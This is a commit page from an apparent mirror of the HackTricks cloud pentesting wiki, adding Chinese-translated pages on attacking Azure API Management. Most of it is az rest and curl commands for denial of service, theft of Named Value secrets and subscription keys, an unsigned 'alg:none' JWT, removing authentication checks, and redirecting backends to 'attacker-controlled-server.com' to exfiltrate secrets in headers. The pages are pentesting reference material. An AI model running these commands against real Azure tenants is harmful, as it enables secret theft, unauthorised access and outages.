gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-25 20:34:33 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

Browse Source
This commit is contained in:
Translator
2025-12-23 16:36:11 +00:00
parent a634283248
commit a35a339c77
3 changed files with 319 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

75
src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md Normal file
View File

@@ -0,0 +1,75 @@
# Azure - API Management Post-Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
攻击者可通过多种向量触发 denial of service。为阻断合法流量攻击者会添加值极低的 rate-limiting 和 quota policies从而有效阻止正常访问
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
为了阻止特定的合法客户端 IP攻击者可以添加 IP 过滤策略以拒绝来自选定地址的请求:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`
要使请求失败,攻击者可以修改 backend 配置并将其 URL 更改为无效或无法访问的地址:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'
```
或者删除 backends:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/apis/delete`
要使关键 APIs 无法使用,攻击者可以直接从 API Management service 删除它们:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
要阻止来自互联网的访问,攻击者可以在 API Management 服务上禁用公共网络访问:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'
```
## `Microsoft.ApiManagement/service/subscriptions/delete`
为了阻止合法用户访问,攻击者可以删除 API Management 的订阅:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
{{#include ../../../banners/hacktricks-training.md}}

170
src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md Normal file
View File

@@ -0,0 +1,170 @@
# Az - API Management Privesc
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
该攻击涉及访问存储在 Azure API Management Named Values 中的敏感机密,攻击者可以通过直接检索机密值,或滥用权限通过 managed identities 获取 Key Vault 支持的机密。
```bash
az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
```
## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
对于每个订阅,攻击者可以通过使用 listSecrets 端点并使用 POST 方法获取订阅密钥:
```bash
az rest --method POST \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
```
响应包含订阅主密钥 (primaryKey) 和辅助密钥 (secondaryKey)。凭借这些密钥,攻击者可以对通过 API Management Gateway 发布的 APIs 进行身份验证并访问:
```bash
curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
https://<service-name>.azure-api.net/<api-path>
```
攻击者可以访问与该订阅相关的所有 API 和产品。如果该订阅可以访问敏感产品或 API攻击者可能会获取机密信息或执行未授权的操作。
## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
攻击者首先检索当前的 API 策略:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
```
攻击者可以根据其目标以多种方式修改策略。例如,为了禁用身份验证,如果策略包含 JWT token validation攻击者可以删除或注释该部分
```xml
<policies>
<inbound>
<base />
<!-- JWT validation removed by the attacker -->
<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
...
</validate-jwt> -->
</inbound>
<backend>
<base />
</backend>
<outbound>
<base />
</outbound>
<on-error>
<base />
</on-error>
</policies>
```
为了移除 rate limiting controls 并允许 denial-of-service attacks攻击者可以移除或注释掉 quota 和 rate-limit policies
```xml
<policies>
<inbound>
<base />
<!-- Rate limiting removed by the attacker -->
<!-- <rate-limit calls="100" renewal-period="60" />
<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
</inbound>
...
</policies>
```
要修改后端路由并将流量重定向到攻击者控制的服务器:
```xml
<policies>
...
<inbound>
<base />
<set-backend-service base-url="https://attacker-controlled-server.com" />
</inbound>
...
</policies>
```
随后攻击者应用修改后的策略。请求主体必须是一个包含以 XML 格式表示策略的 JSON 对象:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
}
}'
```
## JWT 验证 错误配置
攻击者需要知道某个 API 使用 JWT token 验证且该策略配置错误。配置不当的 JWT 验证策略可能包含 `require-signed-tokens="false"``require-expiration-time="false"`,这会允许服务接受未签名的 tokens 或 永不过期的 tokens。
攻击者使用 none 算法 (unsigned) 创建一个恶意 JWT token
```
# Header: {"alg":"none"}
# Payload: {"sub":"user"}
eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
```
攻击者使用恶意令牌向 API 发送请求:
```bash
curl -X GET \
-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
https://<apim>.azure-api.net/path
```
如果策略被错误配置为 `require-signed-tokens="false"`,服务将接受未签名的令牌。 如果 `require-expiration-time="false"`,攻击者也可以创建没有过期声明的令牌。
## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
攻击者首先检查服务的当前网络配置:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
```
攻击者会查看 JSON 响应以验证 `publicNetworkAccess``virtualNetworkType` 的值。如果 `publicNetworkAccess` 设置为 false 或 `virtualNetworkType` 设置为 Internal则该服务配置为私有访问。
要将服务暴露到 Internet攻击者必须更改这两个设置。如果服务以内部模式运行`virtualNetworkType: "Internal"`),攻击者会将其改为 None 或 External 并启用公共网络访问。可以使用 Azure Management API 完成此操作:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Enabled",
"virtualNetworkType": "None"
}
}'
```
一旦 `virtualNetworkType` 被设置为 `None``External` 并且 `publicNetworkAccess` 被启用,服务及其所有 APIs 就会从 Internet 可访问,即使它们之前受私有网络或私有终端节点保护。
## `Microsoft.ApiManagement/service/backends/write`
攻击者首先枚举现有的 backends 以确定要修改的哪一个:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
```
攻击者获取要修改的后端的当前配置:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
```
攻击者将后端 URL 修改为指向他们控制的服务器。首先,他们从之前的响应中获取 ETag然后更新后端
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"description": "Backend modified by attacker"
}
}'
```
或者,攻击者可以配置 backend headers 来 exfiltrate 包含机密的 Named Values。 这是通过 backend credentials configuration 完成的:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"credentials": {
"header": {
"X-Secret-Value": ["{{named-value-secret}}"]
}
}
}
}'
```
通过此配置Named Values 会作为 headers 在所有发往攻击者控制的后端的请求中发送,从而使敏感机密得以外泄。
{{#include ../../../banners/hacktricks-training.md}}

74
src/pentesting-cloud/azure-security/az-services/az-api-management.md Normal file
View File

@@ -0,0 +1,74 @@
# Az - API Management
{{#include ../../../banners/hacktricks-training.md}}
## 基本信息
Azure API Management (APIM) 是一个完全托管的服务,提供一个**用于发布、保护、转换、管理和监控 APIs 的统一平台**。它使组织能够**集中其 API** 战略,并确保在所有服务中实现一致的治理、性能和安全。通过在后端服务与 API 消费者之间作为抽象层APIM 简化了集成并提高了可维护性,同时提供关键的运营与安全能力。
## 核心概念
**API 网关** 作为所有 API 流量的单一入口点,处理将请求路由到后端服务、实施速率限制、缓存响应以及管理认证和授权等功能。此网关由 Azure 完全托管,确保高可用性和可扩展性。
**开发者门户 (Developer Portal)** 提供一个自助环境API 消费者可以在此发现可用的 APIs、阅读文档并测试端点。它通过提供交互式工具和访问订阅信息来简化入门流程。
**管理门户 (Management Portal / Management Plane)** 由管理员用于配置和维护 APIM 服务。管理员可以在此定义 API 与操作、配置访问控制、应用策略、管理用户并将 APIs 组织为产品。该门户集中管理并确保一致的 API 治理。
## 认证与授权
Azure API Management 支持多种**认证机制**来保护 API 访问。这些包括 **subscription keys**、**OAuth 2.0 tokens** 和 **client certificates**。APIM 还与 **Microsoft Entra ID** 原生集成,实现**企业级身份管理**和对 API 及后端服务的**安全访问**。
## 策略
APIM 中的策略允许管理员在不同粒度级别上自定义**请求与响应处理**,包括**service**、**API**、**operation** 或 **product** 级别。通过策略,可以实施 **JWT token validation**、**转换 XML 或 JSON 有效负载**、**应用速率限制**、**按 IP 地址限制调用**,或**使用 managed identities 对后端服务进行身份验证**。策略具有**高度灵活性**,是 API Management 平台的**核心优势**之一,使得在不修改后端代码的情况下实现对运行时行为的**细粒度控制**。
## 命名值
该服务提供一种称为 **Named Values** 的机制,允许存储**配置信息**,例如**secrets**、**API keys** 或策略所需的其他值。
这些值可以直接存储在 APIM 内,或从 **Azure Key Vault** 安全引用。Named Values 促进了配置信息的**安全且集中化管理**,并通过允许**可重用引用**而不是硬编码值来简化策略编写。
## 网络与安全集成
Azure API Management 可与**虚拟网络环境**无缝集成,支持与后端系统的**私有且安全的连接**。
当部署在 **Virtual Network (VNet)** 内时APIM 可以访问**内部服务**而无需公开暴露它们。该服务还允许配置**自定义证书**以支持与后端服务的**双向 TLS (mutual TLS) 认证**,在需要**强身份验证**的场景中提升安全性。
这些**网络特性**使得 APIM 适用于**云原生**和**混合架构**。
### 枚举
要枚举 API 管理服务:
```bash
# Lists all Named Values configured in the Azure API Management instance
az apim nv list --resource-group <resource-group> --service-name <service-name>
# Retrieves all policies applied at the API level in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
# Retrieves the effective policy for a specific API in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"
# Gets the configuration details of the APIM service instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
# Lists all backend services registered in the APIM instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
# Retrieves details of a specific backend service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
# Gets general information about the APIM service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01"
# Calls an exposed API endpoint through the APIM gateway
curl https://<apim>.azure-api.net/<api-path>
```
{{#include ../../../banners/hacktricks-training.md}}